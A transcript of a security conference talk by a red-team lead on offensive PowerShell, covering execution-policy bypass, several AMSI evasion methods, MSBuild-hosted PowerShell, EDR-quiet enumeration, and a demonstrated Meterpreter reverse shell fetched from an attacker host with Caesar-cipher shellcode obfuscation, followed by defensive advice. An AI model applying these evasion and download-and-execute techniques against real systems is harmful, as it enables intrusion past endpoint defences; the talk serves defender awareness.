PowerShell's Return to Power

hey everyone thanks for coming to listen to a grown man complain about powershell my name is david schloss i'm an offensive security lead at echelon cyber and risk so what that means is basically i run all of our pen testing red teaming anything that emulates a criminal that's going to be my wheelhouse you can find my email address here in case you want to you want to link up with me later or you can hit me up on linkedin i do post uh tips and tricks on red teaming periodically on there so come check me out uh i also like to say i'm a self-proclaimed malware dev i like to see if i can defeat avs

doesn't always happen uh and then a little bit about our company just because you know we're small we're a cyber security firm we offer defensive advisory and offensive services so come check us out if you'd like so what is today's goal basically i want you guys to have a healthy dose of paranoia about having powershell on your user's workstation um ever since we kind of moved away from powershell as a main attack platform and moved into like c-sharp using things like sharp pound or sharp dump or other things like that we've kind of ignored that powershell is still a very viable attack path for attackers um and as we'll show in this presentation things that have been

around since like 2015 2016 still function as as well as they did back then so how are we going to do that uh well we're first going to go over the allure of powershell like why it admins love it why attackers love it uh and then we're gonna go into bypassing controls so that it's gonna be like science script execution amz white listing and some like edr enumeration alerts and then we're going to wrap all of that up into malware deployment and how you can protect yourself so let's start off so why do admins love it well basically it's everywhere right it's market share it's huge it's on windows linux mac i had it on my linux

machine i had it on my mac machine when i had a mac right there wasn't a need to um really learn anything new as far as languages go it's it's just there right it's easy to use and learn this is actually the first application i learned um even before python or c uh powershell is the first thing and it is super simplistic there's resources everywhere and then lastly it enables more functions around a remote administration uh when i was an i.t admin it would take my my task from like a couple hours down to like a couple minutes it it it's really a useful tool for admins uh but you know why do attackers love it

basically it's everywhere right it's on windows linux mac i don't need to learn impact it to go from linux to windows it already talks natively in that regard i have it on my kali linux machine super simplistic it's easy to use and learn there's a ton of resources when it comes down to offensive powershell usage uh as people just like to kind of go out there and and show off what they can do with it and it enables more functions around remote administration so if you have powershell already installed on your lin or kali linux machine you really don't need to to learn other tools in order to interact with windows environments and you can get your your

malware other functions from your linux to windows pretty quickly so really the the attackers here have the advantage right i think what a lot of people seem to forget is that scripts can be run entirely from memory you can just copy and paste it from the internet into a terminal as long as you have terminal access though to caveat that if you have a really good edr you might be able to capture some of that those malicious scripts in like the temporary files but you know they are only temporary but because of this uh signature based avs have a really hard time detecting activity that's being done from within a powershell shell because powershell is

considered a trusted pid it's not going to be constantly reading the memory that's being run in there just like python is scriptable c this is scriptable.net as we'll get into a little bit later in this and then everybody just likes to bash on microsoft so organic security functions are constantly getting defeated and they're constantly being publicized and it's it's wonderful for us attackers and it's kind of annoying for the defenders uh and that kind of you know sets the stage what we're going to be doing so we're mostly going to focus today on bypassing organic controls with a little bit of like non-organic controls and one of those first controls that we're going to talk about is the script

signing execution now for the attackers in the room you guys are all going to kind of groan and be like oh really this guy's going to be talking about script signing execution for those who don't know this function is a control that's set far forth by microsoft to restrict you executing um scripts that aren't already signed in its default uh policy which is restricted you are restricted down to uh shells that are not shells sorry uh scripts that are signed by microsoft um one thing to caveat or not caveat but point out there here is is script signing execution is not a security control uh but a lot of people tend to use it as a security control so

in this screenshot we can see that we have a low privileged user trying to get the execution policy which is set to restricted and then they're trying to set the execution policy to execution policy bypass which will allow you to just run whatever script you want and for most administrators you'll recognize this there's an access denied prompt that gets pushed back so you're not able to change it the reason why this isn't a security control on microsoft has said it's not a security control is because it's just very simple to bypass it uh let's say you don't have admin privileges but you still want to run scripts on a device all you have to do is actually

execute powershell.exe tech ep or tac execution policy bypass and it'll put it into the bypass policy the reason this happens is when you're doing set execution policy the command you're actually trying to set a registry hive within the local machine registry uh or that hive uh which requires admin access but when you do powershell.exe tac ep execution policy bypass it's only setting it for that instance it's not going to navigate into another window so if you do re-execute powershell it's going to go back to the machine default so hopefully now that you guys know that script sign-in execution is not a security control you guys aren't going to use it as a security control moving forward because

it is quite common to see that and this is going to lead us right into the fun stuff which is amsi or amz or the anti-malware scan interface this is going to be the bulk of the presentation we're going to talk a little bit about like methods that have worked in 2015 and they still work today which is very minor modifications but what amsi is is a known good hook that was developed by microsoft for defense products to integrate into their their systems and it's integrated into like uac windows script hosts office macros powershell vbscripts you name it if microsoft provides it as a function or a scripting language you you're gonna see amses integrated into that

and it's really cool because it'll block known malicious scripts and functions so like the iex download string command which is very commonly used by us attackers to import malicious scripts into powershell just completely blocked with amsi it also looks out for for um strings like mimikatz bloodhound power view i i believe it still alerts on matt graber's name you know if if it's malicious it's going to it's going to try to alert on it some of the known integrated antivirus applications that are using this right now are like mcafee sofos kaspersky windows defender kind of a duh there and there is probably more but this isn't a list that is provided by microsoft at least not from what i've seen

so you have to kind of dig through but there are people who are using this known good hook by microsoft uh but unfortunately because microsoft is always trying to do the backwards compatibility thing there's a very very easy bypass when it comes down to amz which is just downgrade powershell right um powershell 2.0 is installed by default it it would be considered uh living off the lan binary right um some things that you lose out when you go down to powershell 2.0 is automatic triplock logging on suspicious scripts so if you aren't already setting up script block logging you're no longer getting any of those alerts for suspicious scripts the only caveat i would put here is that

if you are looking to run powershell 2.0 you do need net version 2.0 uh but then a second caveat to that is if you have older software on your network that requires net 3.5 uh then dot net 2.0 is installed because they are bundled together for some reason so what does that look like very simply it's it's quite the easiest bypass in the world and this gets a lot of my clients in the past the first thing you can see here is we're running ps version table that's just to show you that we are running version 5.1 and then i'm trying to echo amsi utils the reason why i do amsi utils is because i know it's a known

uh string that amsi will try to block you using because it doesn't like you calling itself uh so we try to echo amazing utils it tells us hey no that's not that's not allowed you know you're you're blocked by the anti-virus uh then you just run powershell.exe attack version two and now when you echo amsi utils it works right super simple very easy still works in 2021 this has been around forever i don't know why they haven't just removed uh the binary as a whole but you know if you don't have this disabled on your network probably a good thing to do that now or soonish um so what happens if you can't run uh powershell version two

well then we need to get into some like amsi bypassing or like amsi crashing so when we are trying to defeat amsi as attackers we're always trying to put ramsey into a failed state um the reason being is when amsi is in a failed state it doesn't have a like recovery function so it just continues to stay failed so if you're able to crash it for that instance like let's say you have a powershell terminal and you crash amsi you now have a amsi free terminal if you rerun powershell amsi will come back so the function that we're going to or the method that we're going to talk about today is a few but on this one is going

to be the matt graber method which is used in reflection back in like 2015 matt graber found that it was really really simple to just call uh amsi utils and then get the the the field of amsi and it failed and setting that to true and that's enough to crash ramsey it goes oh yeah hey my field says uh i don't work no more and it doesn't um thankfully microsoft was really quick on the fix and they implemented so you couldn't call amzee utils or amsi and it failed anymore uh the problem is is despite microsoft saying that they they check for concatenation before execution with amsi uh it wasn't true so the the line below it which has the concatenated

mzutils in mz and it failed uh that worked up until last year uh it no longer works and this kind of took us down into a dive on to why it no longer works and we're going to explore that right now so the first thing we needed to figure out is we need to have our baseline we needed to look at system management automation amsi utils let's see if we can call it it does block it because we are not trying to concatenate anything or try to obfuscate in any form or fashion but if we do concatenate amsi utils it does print which means that still technically works in 2021. uh and that that led us to okay so how

deep down the rabbit hole uh do we need to go before amsy starts blocking us so the next logical step was to go out one field right let's go and get the amsi and it failed field and with concatenation on amz and it failed it does read out we can see that the the the name of the uh the field we can get the location of it what type of field it is is it public all the information that we possibly need on it which means concatenation really isn't the problem here uh there's something else going on um and thankfully shout out to secure this who has like a great write-up on on what is actually going on but it

turns out that when you are calling an assembly type and then you're getting the field and then you're trying to set the value amzi does some regex sees that and goes okay now let's concatenate this all and see what it's really calling so that they can make sure you know you're not uh you're not calling amzee utils uh which is cool that's that's really a neat fix for them uh but my number one rule when defeating powershell is when in doubt encode it out uh and the cool thing about that is i like to use hex because base64 is already organically in powershell right you can call a base64 encoded command from within powershell hex is not

so in this case you can just concatenate amseutils and format format it into hex using like utf encoding and once we have our text into hex we need to turn our hex into text so you get this sweet little like dr seuss rhyme in it right uh so we need like a one-liner to turn that hex back into text and that's pretty simple because all we have to do is just split each hex line or each hex section and then convert that back into a character which we can do with the code below so when we do our one-liner and we print it out it prints out amazing utils and we haven't even defeated amsi at all so it is it's not

like checking this execution before we go forward which is really neat so what we can do with that is we can just replace in our code mzutils and amzie and it failed with this small section of code to turn our hex back into text and what that looks like is this so the first thing we're going to do is we're going to call amze utils show you that mz is indeed working we're being blocked and then we're going to copy in our hex encoded uh text hit enter call amze utils again and now we can see that mzutils is being called we can echo it out which is showing us that amsi has been defeated

so this method that has been or that was developed in like 2015 is still functioning to this day right with very minimal kind of changing we haven't had to obfuscate it too much we we really haven't had to do a whole lot like i'm not doing a caesar cipher i'm not doing any sort of encryption i'm just changing the way that the code or the text is being interpreted and now it works so you know us ignoring the problem uh for so long is has allowed us to continuously evolve or us as attackers to evolve and create like small little changes to code and and things have been working for five six years still work

so the next piece here is that we're going to talk about is the rostamouth method the reason why i wanted to bring this method up is because i had mentioned that powershell is scriptable.net in this case this is just c sharp code that's able to be run in powershell very simplistic very easy and what it's doing is it's patching the dll and it's patching the library amsi scan buffer so a really fun function about amsi is um or a fun fact about amsi is that uh amsi's functions like to have a static first couple of bytes in all of its functions which amsi will go out and check to see if those bytes are still

the same uh and those those first couple bytes are amsi right so it's checking hey does the function still start with amsi yeah it still it still functions all right cool we're going to keep going so it doesn't crash it so what you can do is actually just like find the uh address for like amsi scam buffer mz contacts things like that just rewrite the first couple of bytes with literally anything that you want and you'll crash amsi it's pretty neat so this is a pretty obvious kind of attack towards amsi right it's loading the the loaded dll that's um within powershell which is kind of a cool idea and then patching out some bytes which

if we go and look at how that looks you don't have to do anything fancy with this this still works like i haven't had to change any of the code minus concatenation put that in hit enter now we type amze again maybe there we go and we're able to call it right so some things that should be going through your mind at this point as well that's outside of amsi is like if you can edit loaded dlls um can you unhook dlls or re-hook clean dlls uh powershell is is powerful so it's pretty neat you know i like to call this one out because a lot of people think that like oh yeah you know you have to get super

complex with it like i haven't changed any of the code that i got off of github on this one and i've used it in the past and it hasn't been caught it's a it's a pretty easy method for defeating amsi so what happens when you can't run the code to bypass amsi right uh whether that be a powershell is in and is not an x a white listed application or you're operating in restricted language bypass or restricted language mode you could bypass it by going down to powershell version 2.0 or you can do what i like to do which is build your own powershell because powershell is really just a bunch of dlls loaded on top of the

command prompt and then they called it power shell right kind of obvious when you look at it that way but it's a very simple um way of doing that you can actually just go to github go to this ms build shell download it i've put this on on clients machines in the past when we've been doing red teams or pen tests and ultimately it hasn't been caught by an anti-virus because well it's not malicious in itself right if they start alerting on the functions in there they will start potentially having false positive with other applications so in this case ms build shell from this github page is using the msbill.exe living off the line binary which is

included with net version 4.0 so in this case we have the command prompt open i'm running ps version table to show you guys that it does not have any sort of powershell stuff loaded oops try that again and then i'm calling msbell.exe with our ms build shell.cs project file so you don't need to have visual studios code or visual studios or any sort of like compilation program all you need to do is have ms build.exe which will build a cs project file so when we hit enter here it's going to start building the engine and then we're presented with this wonderful like bright blue screen and when we type ps version table we get the actual response that we're looking

for now you'll probably notice some red up here that's the um mz bypass that it's trying to do it's the old matt graber method without any obfuscation you can go into the code and edit it if you really want to so that you can get past amsy and all that jazz but it's not necessary additionally the only other function that you lose by building your own powershell is the ability to tab out commands but as an attacker i don't think you really are too worried about that if you're just trying to get powershell on a on the device so when we exit we can see that we're back down to a command prompt so here are some more ways to do it um i

don't want to get too deep in the weeds about this because we could go like a whole hour just on on building powershell itself but there are projects out there like the powershell dll project which you can use anything that executes dlls or my personal favorite which is the syncap publishing server.vbscript which is included by default as well i'm not too sure why but if you put in that like break iwr and then your ip and have a netcat listener you'll get a powershell callback super cool shout out to irad team here because they have a lot of great write-ups on how to use some of these like powershell dll project bypasses go check them out

so we've talked a lot about the organic controls we're going to kind of wrap it up here as far as bypassing controls with some edr detection controls what i think a lot of people don't seem to realize is that commands um like ipconfig who am i netstat netsh these are all like dos applications that are in your c windows system32 files uh folder system um edrs have gotten really smart on how to detect when a system is being enumerated because we as attackers haven't really learned to not just like systematically call ipconfig who am i sysinfo um you know like a ton of these commands all in a short duration uh which a human isn't necessarily gonna do

right they an iti man may come in and do a ipconfig or who am i a netstat right but it's not going to run through this whole exhaustive list of like let me get all of the information here uh so the really really cool thing about powershell is that scriptable.net which allows us to do really fun things like call environment variables or call the windows api so let's say we want to do who am i who am i is like this desktop attack av low priv like okay that's cool well we can change that up and just call the environment variables like in variable or environment variable user domain and environment variable username and it kind of has a better like output

in my opinion i like that a little bit more or let's say we want to do ipconfig so we can use the net dns library and get host address for our local host and it'll print it out it's not as pretty don't get me wrong but it does function so we can use powershell to actually function kind of like how an installer would enumerate a device and that's going to get around a little bit lower end edr products and this is kind of fun you can experiment it you can find different ways of of printing out the same exact data and it's almost like reinventing the wheel but it does avoid uh detection and for us red teamers

avoiding detection is always super important so that wraps it up for evasion techniques right our bypassing and we talked all about that just so we could get to this malware deployment so we can really like sink in that uh what do you want to call it that paranoia right powershell is really really nice on being able to execute code because you just take your c sharp code and turn it into powershell uh this is exactly why everybody went from powershell to c sharp when all of the defense was looking into powershell thanks to that powershell empire and others uh but you know we stopped paying attention and that allowed for the same old techniques to come back out and

still work so to get basic code execution you really only need a few things which is like some allocated memory you need the ability to copy that memory or your shell code into the allocated memory and in the ability to create a thread now if you really want to get into the weeds of things and how you would evade you you would use others but this is just basic code execution and then you also need to do some avoidance of avs it's not as um as important but it is still kind of a requirement uh you need a way to be able to reflectively call your dlls especially because if you don't reflectively call those dlls it will create a temporary

dll on disk and then you know some shell code obfuscation which powershell makes super simple as well so as far as like importing and executing your code it's very very simple the very very top uh line here this dll import this is taken straight from p invoke so this is how you would write it into c sharp and then this line below it is actually using matt graber's reflective dll loading method so almost exactly the same but in this case we we don't have like an unsigned integer you only have unsigned integer 32 and unsigned integer 64. uh and then when you want to go execute that code it's literally the same the only difference here is your type

name is what you are building with the macgraber reflective dll loading so you do need to create a type but it's no different than how you would call it anywhere else so taking your malware from c sharp and bringing it into powershell super simple and then that brings us into the last piece of it which is shellcode offuscation right powershell reads everything in bytecode or reads by code as decimal instead of hex so i prefer decimal over hex because i just find 0 0 0 to 255 so much easier than 0 0 0 to 0 f f and when you have this like decimal you can apply really basic encoding principles to it like the caesar cipher right

i think a principle that is missed a lot by attackers is you don't have to be complex with your obfuscation you just have to have it custom so if you use a caesar cipher it will work like i've run code like meterpreter code on on systems just using a caesar cipher what a caesar cipher is is taking a byte and pushing it to the right or left depending on which way you want to go in this case we'll push everything five to the right so zero zero zero becomes zero zero five but that creates a problem with like a integer overflow because you can't go over 256. so 255 would be 260. that's not good that's not gonna work

the nice thing is powershell provides you with a really easy operator for modulus uh so you can take your number plus or minus your offset and then use modulus which is the percent sign of 256. so if we're pushing everything to the right zero zero five or zero zero zero becomes zero zero five and two five five becomes zero zero four right super simple super easy to implement so what does that look like in this case i built an interpreter shell in powershell script using meterpreter reverse https we're gonna go ahead and run that and then we're going to go into our av dev uh my machine which has av on it and i talked a lot about copying and

pasting things in this time we're just going to import it one thing to note here is before we begin the powershell pid is 11496. that's important because we are not going to create like a brand new process we're just creating a new thread within this process uh no

okay let's go back so we're gonna look at the pit again and then we're gonna copy in uh mzutils type it in show you that is amsi is functioning and then we're going to copy in our dotnet way of of importing right so i had mentioned that iex download string gets blocked by amse what's really cool is dot net web request does not so in this case before we move on uh i'll go through this code real quick so we're calling the dot net web request we're going to create a new request towards our malicious host uh and we're going to download bsides.ps1 we're going to grab that response and then we're going to get the stream and

we're going to download that data stream we're going to read it all the way into the all the way to the end and we're going to import that into a variable once we have that variable we're going to execute it using iex so we're not using iex download string to instantly execute upon that code so when we execute it down here it'll say hey you know print out iax content we run iex content now we have the script in here so when we write invoke b sides execute that and then we execute order 66 or offset at 66 it's running you notice there's nothing being alerted down at the bottom no antivirus alerts we come back here

and we have a reverse shell and we get the uid we're on the low privilege user and our pit of 11496 uh the way we're doing it with this way though with with creating a thread that when we close this um interpreter shell it will crash uh powershell just as a caveat but that's a little concerning right like it's so simple to execute code on um a machine just using powershell still you know nothing's really had to change in the last couple years uh we haven't really had to change the way that we've done code execution now you can get even more fancy with it and make it a lot harder for the defenders to go and find your activity

but you know just this basic code execution still works so now that you guys are hopefully a little paranoid what can you do what do you do about it i dump everything into these four simple steps the first one is disable powershell i personally don't think that every user needs to have it you wouldn't give your users python so why would you give every user powershell that being said right you would if you need to use it for your administration or you have users that have legitimate reasons to use it then you need to start looking at like application white listing and blacklisting and if you do that then you need to really expand your application

blacklisting you need to look at every living off the land binary that are out there not everything that microsoft provides to you is actually safe i don't know if you guys remember dde auto but that was a complete security flaw um and they just said oh it's a feature it's not a flaw uh i would say you know definitely increase your uh security products go for ai-based security products i know i've mentioned that it is possible to you know re-hook or unhook um dlls especially those like kernel 32 or nttdl and tdl but when you unhook those dlls the more advanced ai based security products are able to determine when a system is being bypassed

and the last thing it's not necessarily for any of you guys out there maybe uh but microsoft you guys definitely need to fix your stuff there's just too many inherent flaws with these security controls and ultimately like a a defeat that was built five years ago still works today because um amsi doesn't function in the way that it is advertised uh and that's that's kind of concerning but with that this is my information again in case you wanted to download the slides you can come to our website slash b-sides and download those slides reach out to me anytime on linkedin send me an email i like talking about just about anything i'm too extroverted for my own good

so with that thank you very much for your time it was a pleasure i hope you guys have a good rest of your day ask any questions